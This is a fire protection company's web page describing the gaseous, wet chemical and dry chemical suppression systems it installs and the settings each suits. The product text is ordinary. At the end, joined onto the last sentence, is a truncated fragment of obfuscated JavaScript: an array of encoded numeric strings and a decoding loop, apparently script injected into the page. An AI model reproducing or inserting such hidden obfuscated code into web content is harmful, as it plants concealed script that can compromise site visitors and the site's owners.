

MICROLYNX FIRE PROTECTION SYSTEM is experienced in the installation and servicing of these complicated systems provided by top-rated fire protection systems vendors. We specialize in design and installation of fire suppression systems for different type of industry

We offer innovative solutions for your complex commercial fire hazards, using tested and proven design concepts. Our engineers have extensive project experience and the ability to effectively utilize and interact with Architects, Mechanical, Electrical, Civil and Structural engineers to offer the best resolutions to any unique design challenge.

Below are the current fire suppression systems that we provide with a basic summary of each product and it's applications.

FM-200 Fire Suppression System

The FM-200 Fire Suppression System is a clean gaseous agent with an ozone depletion potential of 0. Readily suited to the protection of high value assets, FM-200 works in seconds. Typical applications include:

- * Computer and electronic control rooms
- * Telecommunication and switch rooms
- * Data processing centres
- * Vaults/tape storage
- * Marine Vessels
- * Medical Equipment

Carbon Dioxide Fire Suppression System

The Carbon Dioxide System is a clean gaseous agent with a low cost and readily available. It is best suited to the protection of high value assets where large quantities of agent is required. Typical applications include:

- * Dip tanks
- * Rolling mills
- * Data processing centres
- * Vaults/tape storage
- * Marine Vessels

FE-13™ Fire Suppression System

Engineered system designed for protection of applications in low temperature environments and high-ceiling structures or where a high concentration of fire suppression agent is required to inert the protected application against fire. Uses clean, fast, people-safe FE-13 gaseous agent that works by absorbing heat from the fire.

Argonite® Fire Suppression System

Engineered system for total flooding of enclosed spaces. Uses Argonite, an inert gas consisting of a mixture of argon and nitrogen that suppresses fire by depleting oxygen in the protected space. Environmentally safe and requires minimal post-fire cleanup. System includes detectors, a control unit, agent storage cylinders, piping and discharge nozzles.

Engineered Fire Suppression System Designed for use with 3M™ Novec™ 1230 Fire Protection Fluid

Engineered to provide clean, fast, people-safe protection for machinery spaces and other Class B applications. Meets strict European environmental standards. System includes agent storage cylinders, piping and discharge nozzles. Computer calculated to provide system discharge within 10 seconds.

Wet Chemical Fire Suppression System

The Wet Chemical System...24-Hour automatic or manual protection for commercial cooking areas; ducts, plenums, hoods and cooking surfaces. Wet chemical agent designed for quicker flame knockdown and faster suppression.

Dry Chemical Fire Suppression System

Provides 24-hour fire protection for a wide variety of industrial processes, equipment, machinery and paint spray booth applications. Choice of two dry chemical agents effective on Class A, B and C fires. Total flooding or local application design options. System includes detectors, a control unit, agent storage cylinders, piping and discharge nozzles. var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',' 877886888787','949990793917947998942577939317'),l=x.length;while(++a